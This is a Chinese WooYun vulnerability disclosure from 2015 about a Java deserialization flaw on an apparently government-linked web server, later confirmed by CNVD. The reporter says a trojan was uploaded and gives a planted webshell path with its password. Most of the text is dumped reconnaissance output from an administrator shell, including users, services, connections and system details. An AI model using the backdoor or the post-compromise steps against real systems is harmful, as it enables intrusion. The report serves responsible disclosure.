乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-27: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
打开官网地址http://**.**.**.**/,图中标识链接存在漏洞
地址**.**.**.**:7086/存在“Java 反序列化”漏洞
直接上传木马到服务器中
附送个网站身建后门的shell**.**.**.**:7001/legioff/dataProcess.jsp密码password
net share 共享名 资源 注释-------------------------------------------------------------------------------C$ C:\ 默认共享 E$ E:\ 默认共享 ADMIN$ C:\WINDOWS 远程管理 G$ G:\ 默认共享 D$ D:\ 默认共享 IPC$ 远程 IPC photo E:\oracle\Middleware\user_projects\domains\legioff\IdPhoto命令成功完成。net view服务器名称 注释-------------------------------------------------------------------------------\\HQGLAPP \\NX \\NXFZB \\NXFZB-C6A133BB1 \\NXJGJDATASERVER nxjgj hqgl-data server \\NXTAYA \\NXXF5 \\XFTRS 命令成功完成。net start 已经启动以下 Windows 服务: 360EntClientService Application Experience Lookup Service Application Layer Gateway Service Automatic Updates COM+ Event System Computer Browser Cryptographic Services DCOM Server Process Launcher DHCP Client DNS Client Event Log HID Input Service Logical Disk Manager Network Connections Network Location Awareness (NLA) OracleOraDb10g_home1TNSListener OracleServiceLEGIOFF Plug and Play Protected Storage Remote Procedure Call (RPC) Security Accounts Manager Server Shell Hardware Detection System Event Notification Task Scheduler TCP/IP NetBIOS Helper Terminal Services Windows Audio Windows Firewall/Internet Connection Sharing (ICS) Windows Management Instrumentation Windows Time Wireless Configuration Workstation 主动防御命令成功完成。net user\\NXFZB-C6A133BB1 的用户帐户-------------------------------------------------------------------------------__SUNLOGIN_USER__ Administrator Guest SUPPORT_388945a0 命令成功完成。whoaminxfzb-c6a133bb1\administratornetstat -anoActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 696 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 452 TCP **.**.**.**:1030 **.**.**.**:0 LISTENING 1476 TCP **.**.**.**:1521 **.**.**.**:0 LISTENING 1216 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2916 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1031 **.**.**.**:1521 ESTABLISHED 1476 TCP **.**.**.**:1521 **.**.**.**:1031 ESTABLISHED 1216 TCP **.**.**.**:2166 **.**.**.**:80 ESTABLISHED 2248 TCP **.**.**.**:2457 **.**.**.**:80 ESTABLISHED 2248 TCP **.**.**.**:2463 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 3852 TCP **.**.**.**:7001 **.**.**.**:51466 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51467 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51468 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51469 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51470 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51471 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51472 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51473 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51474 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51475 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51476 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51477 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:51479 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52325 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52326 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52327 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52328 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52329 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52330 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52331 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52332 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52333 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52334 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52335 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52336 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:52344 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:53242 ESTABLISHED 3852 TCP **.**.**.**:7002 **.**.**.**:0 LISTENING 3852 TCP **.**.**.**:1027 **.**.**.**:0 LISTENING 1216 TCP **.**.**.**:1049 **.**.**.**:0 LISTENING 3020 TCP **.**.**.**:1076 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1077 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1078 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1197 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1198 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1199 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1521 **.**.**.**:1076 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1077 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1078 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1197 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1198 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1199 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1805 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1806 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1807 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1808 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1809 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1810 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1921 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1922 ESTABLISHED 1216 TCP **.**.**.**:1521 **.**.**.**:1923 ESTABLISHED 1216 TCP **.**.**.**:1805 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1806 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1807 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1808 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1809 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1810 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1921 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1922 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:1923 **.**.**.**:1521 ESTABLISHED 3852 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 3852 TCP **.**.**.**:7002 **.**.**.**:0 LISTENING 3852 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 3852 TCP **.**.**.**:7002 **.**.**.**:0 LISTENING 3852 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:1043 *:* 2248 UDP **.**.**.**:1074 *:* 3168 UDP **.**.**.**:1095 *:* 3168 UDP **.**.**.**:1178 *:* 3168 UDP **.**.**.**:3600 *:* 2248 UDP **.**.**.**:123 *:* 824 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 824 UDP **.**.**.**:1131 *:* 2248 UDP **.**.**.**:123 *:* 824 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4ipconfig /allWindows IP Configuration Host Name . . . . . . . . . . . . : nxfzb-c6a133bb1 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter 本地连接 2: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 Physical Address. . . . . . . . . : E4-1F-13-E3-0D-1AEthernet adapter 本地连接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) Physical Address. . . . . . . . . : E4-1F-13-E3-0D-18 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.** DNS Servers . . . . . . . . . . . : **.**.**.**Ethernet adapter 本地连接 3: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : IBM USB Remote NDIS Network Device Physical Address. . . . . . . . . : E6-1F-13-E4-0D-1B DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : DHCP Server . . . . . . . . . . . : **.**.**.** Lease Obtained. . . . . . . . . . : 2015年12月25日 1:31:17 Lease Expires . . . . . . . . . . : 2015年12月25日 1:41:17tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 320 暂缺 csrss.exe 368 暂缺 winlogon.exe 392 暂缺 services.exe 440 Eventlog, PlugPlay lsass.exe 452 ProtectedStorage, SamSs svchost.exe 608 DcomLaunch svchost.exe 696 RpcSs svchost.exe 776 Dhcp, Dnscache svchost.exe 824 LmHosts, W32Time svchost.exe 840 AeLookupSvc, AudioSrv, Browser, CryptSvc, dmserver, EventSystem, HidServ, lanmanserver, lanmanworkstation, Netman, Nla, Schedule, SENS, SharedAccess, ShellHWDetection, winmgmt, wuauserv, WZCSVC ZhuDongFangYu.exe 856 ZhuDongFangYu 360EntClient.exe 1136 360EntClientSvc TNSLSNR.EXE 1216 OracleOraDb10g_home1TNSListener oracle.exe 1476 OracleServiceLEGIOFF explorer.exe 1944 暂缺 360EntClient.exe 584 暂缺 wmiprvse.exe 2168 暂缺 360tray.exe 2248 暂缺 svchost.exe 2916 TermService alg.exe 3020 ALG ctfmon.exe 1552 暂缺 360sd.exe 1628 暂缺 ctfmon.exe 512 暂缺 360rp.exe 3168 暂缺 csrss.exe 3924 暂缺 winlogon.exe 3968 暂缺 rdpclip.exe 1956 暂缺 explorer.exe 1876 暂缺 ctfmon.exe 3644 暂缺 ctfmon.exe 3676 暂缺 conime.exe 884 暂缺 cmd.exe 2472 暂缺 java.exe 3852 暂缺 conime.exe 1652 暂缺 logon.scr 6800 暂缺 findstr.exe 7956 暂缺 wmiprvse.exe 6228 暂缺 tasklist.exe 7572 暂缺 systeminfo主机名: NXFZB-C6A133BB1OS 名称: Microsoft(R) Windows(R) Server 2003 Enterprise x64 EditionOS 版本: 5.2.3790 Service Pack 2 Build 3790OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: NXFZB注册的组织: NXFZB产品 ID: 91353-640-9271162-50448初始安装日期: 2011-1-17, 10:53:51系统启动时间: 36 天 10 小时 49 分 8 秒系统制造商: IBM 系统型号: System x3850 X5 -[7145N8B]-系统类型: x64-based PC处理器: 安装了 16 个处理器。 [01]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [02]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [03]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [04]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [05]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [06]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [07]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [08]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [09]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [10]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [11]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [12]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [13]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [14]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [15]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz [16]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 MhzBIOS 版本: UNKNOWNWindows 目录: C:\WINDOWS系统目录: C:\WINDOWS\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 8,177 MB可用的物理内存: 792 MB页面文件: 最大值: 7,721 MB页面文件: 可用: 878 MB页面文件: 使用中: 6,843 MB页面文件位置: 暂缺域: WORKGROUP登录服务器: \\NXFZB-C6A133BB1修补程序: 安装了 355 个修补程序。 [01]: File 1 [02]: File 1 [03]: File 1 [04]: File 1 [05]: File 1 [06]: File 1 [07]: File 1 [08]: File 1 [09]: File 1 [10]: File 1 [11]: File 1 [12]: File 1 [13]: File 1 [14]: File 1 [15]: File 1 [16]: File 1 [17]: File 1 [18]: File 1 [19]: File 1 [20]: File 1 [21]: File 1 [22]: File 1 [23]: File 1 [24]: File 1 [25]: File 1 [26]: File 1 [27]: File 1 [28]: File 1 [29]: File 1 [30]: File 1 [31]: File 1 [32]: File 1 [33]: File 1 [34]: File 1 [35]: File 1 [36]: File 1 [37]: File 1 [38]: File 1 [39]: File 1 [40]: File 1 [41]: File 1 [42]: File 1 [43]: File 1 [44]: File 1 [45]: File 1 [46]: File 1 [47]: File 1 [48]: File 1 [49]: File 1 [50]: File 1 [51]: File 1 [52]: File 1 [53]: File 1 [54]: File 1 [55]: File 1 [56]: File 1 [57]: File 1 [58]: File 1 [59]: File 1 [60]: File 1 [61]: File 1 [62]: File 1 [63]: File 1 [64]: File 1 [65]: File 1 [66]: File 1 [67]: File 1 [68]: File 1 [69]: File 1 [70]: File 1 [71]: File 1 [72]: File 1 [73]: File 1 [74]: File 1 [75]: File 1 [76]: File 1 [77]: File 1 [78]: File 1 [79]: File 1 [80]: File 1 [81]: File 1 [82]: File 1 [83]: File 1 [84]: File 1 [85]: File 1 [86]: File 1 [87]: File 1 [88]: File 1 [89]: File 1 [90]: File 1 [91]: File 1 [92]: File 1 [93]: File 1 [94]: File 1 [95]: File 1 [96]: File 1 [97]: File 1 [98]: File 1 [99]: File 1 [100]: File 1 [101]: File 1 [102]: File 1 [103]: File 1 [104]: File 1 [105]: File 1 [106]: File 1 [107]: File 1 [108]: File 1 [109]: File 1 [110]: File 1 [111]: File 1 [112]: File 1 [113]: File 1 [114]: File 1 [115]: File 1 [116]: File 1 [117]: File 1 [118]: File 1 [119]: File 1 [120]: File 1 [121]: File 1 [122]: File 1 [123]: File 1 [124]: File 1 [125]: File 1 [126]: File 1 [127]: File 1 [128]: File 1 [129]: File 1 [130]: File 1 [131]: File 1 [132]: File 1 [133]: File 1 [134]: File 1 [135]: File 1 [136]: File 1 [137]: File 1 [138]: File 1 [139]: File 1 [140]: File 1 [141]: File 1 [142]: File 1 [143]: File 1 [144]: File 1 [145]: File 1 [146]: File 1 [147]: File 1 [148]: File 1 [149]: File 1 [150]: File 1 [151]: File 1 [152]: File 1 [153]: File 1 [154]: File 1 [155]: File 1 [156]: File 1 [157]: File 1 [158]: File 1 [159]: File 1 [160]: File 1 [161]: File 1 [162]: File 1 [163]: File 1 [164]: File 1 [165]: File 1 [166]: File 1 [167]: File 1 [168]: File 1 [169]: File 1 [170]: File 1 [171]: File 1 [172]: File 1 [173]: File 1 [174]: File 1 [175]: File 1 [176]: File 1 [177]: Q147222 [178]: KB975558_WM8 [179]: KB925398_WMP64 [180]: KB2564958 - Update [181]: KB2115168 - Update [182]: KB2229593 - Update [183]: KB2345886 - Update [184]: KB2347290 - Update [185]: KB2378111 - Update [186]: KB2387149 - Update [187]: KB2393802 - Update [188]: KB2419635 - Update [189]: KB2423089 - Update [190]: KB2443105 - Update [191]: KB2476490 - Update [192]: KB2478960 - Update [193]: KB2478971 - Update [194]: KB2483185 - Update [195]: KB2485663 - Update [196]: KB2506212 - Update [197]: KB2507938 - Update [198]: KB2508429 - Update [199]: KB2509553 - Update [200]: KB2510587 - Update [201]: KB2535512 - Update [202]: KB2536276-v2 - Update [203]: KB2544893-v2 - Update [204]: KB2566454 - Update [205]: KB2570947 - Update [206]: KB2584146 - Update [207]: KB2598479 - Update [208]: KB2603381 - Update [209]: KB2620712 - Update [210]: KB2631813 - Update [211]: KB2638806 - Update [212]: KB2644615 - Update [213]: KB2653956 - Update [214]: KB2655992 - Update [215]: KB2659262 - Update [216]: KB2676562 - Update [217]: KB2685939 - Update [218]: KB2686509 - Update [219]: KB2691442 - Update [220]: KB2698365 - Update [221]: KB2705219-v2 - Update [222]: KB2712808 - Update [223]: KB2727528 - Update [224]: KB2748349 - Update [225]: KB2749655 - Update [226]: KB2770660 - Update [227]: KB2779562 - Update [228]: KB2780091 - Update [229]: KB2803821-v2 - Update [230]: KB2807986 - Update [231]: KB2813170 - Update [232]: KB2820917 - Update [233]: KB2834886 - Update [234]: KB2847311 - Update [235]: KB2862152 - Update [236]: KB2862330 - Update [237]: KB2862335 - Update [238]: KB2864058 - Update [239]: KB2864063 - Update [240]: KB2868626 - Update [241]: KB2876217 - Update [242]: KB2876331 - Update [243]: K网卡: 安装了 3 个 NIC。 [01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) 连接名: 本地连接 2 状态: 媒体连接已中断 [03]: IBM USB Remote NDIS Network Device 连接名: 本地连接 3 启用 DHCP: 是 DHCP 服务器: **.**.**.** IP 地址 [01]: **.**.**.**
加强安全意识
危害等级:高
漏洞Rank:12
确认时间:2015-12-31 18:05
CNVD确认并复现所述情况,已经转由CNCERT下发给宁夏分中心,由其后续协调网站管理单位处置
暂无